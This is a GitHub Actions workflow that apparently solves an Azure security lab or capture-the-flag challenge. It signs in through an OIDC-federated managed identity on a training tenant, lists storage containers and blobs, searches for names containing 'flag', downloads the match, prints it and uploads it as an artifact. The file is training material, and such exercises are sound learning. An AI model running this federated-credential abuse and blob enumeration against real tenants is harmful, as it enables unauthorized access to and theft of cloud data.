name: Azure OIDC Login

on:
  push:
    branches: [ "main" ]   # FICのsubjectと一致させる

permissions:
  id-token: write
  contents: read

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Az login via OIDC (UAMI)
        uses: azure/login@v2
        with:
          client-id: b03c874d-bfc6-4173-9cf0-48440733c8f2
          tenant-id: azure.training.hacktricks.xyz
          subscription-id: 2ebd44a4-e4dd-42e1-8e95-7e4a84601d47

      - name: Verify identity
        run: |
          echo "==== az account show ===="
          az account show
          echo "==== whoami (graph) ===="
          az rest --method GET --uri https://graph.microsoft.com/v1.0/me || true

      - name: List containers (to locate the flag)
        run: |
          az storage container list --account-name "iamazurelab2bd9fdeb3" --auth-mode login -o table

      - name: List blobs in likely containers
        run: |
          for c in $(az storage container list --account-name "iamazurelab2bd9fdeb3" --auth-mode login --query "[].name" -o tsv); do
            echo "== Container: $c =="
            az storage blob list --account-name "iamazurelab2bd9fdeb3" --container-name "$c" --auth-mode login --query "[?contains(name, 'flag') || ends_with(name, '.txt')].name" -o tsv
          done

      - name: Download flag (explicit names or first match)
        run: |
          CONTAINER="${{ secrets.CONTAINER }}"
          BLOB="${{ secrets.BLOB }}"
          if [ -z "$CONTAINER" ] || [ -z "$BLOB" ]; then
            CONTAINER=$(az storage container list --account-name "iamazurelab2bd9fdeb3" --auth-mode login --query "[].name" -o tsv | head -n1)
            BLOB=$(az storage blob list --account-name "iamazurelab2bd9fdeb3" --container-name "$CONTAINER" --auth-mode login --query "[?contains(name, 'flag')].name" -o tsv | head -n1)
          fi
          echo "Target: container=$CONTAINER blob=$BLOB"
          if [ -z "$CONTAINER" ] || [ -z "$BLOB" ]; then
            echo "Flag blob not found." && exit 1
          fi

          az storage blob download --account-name "iamazurelab2bd9fdeb3" --container-name "$CONTAINER" --name "$BLOB" --file "flag.txt" --auth-mode login
          echo "===== FLAG ====="
          cat flag.txt
          echo "=============== "

      - name: Upload artifact (optional)
        uses: actions/upload-artifact@v4
        with:
          name: flag.txt
          path: flag.txt
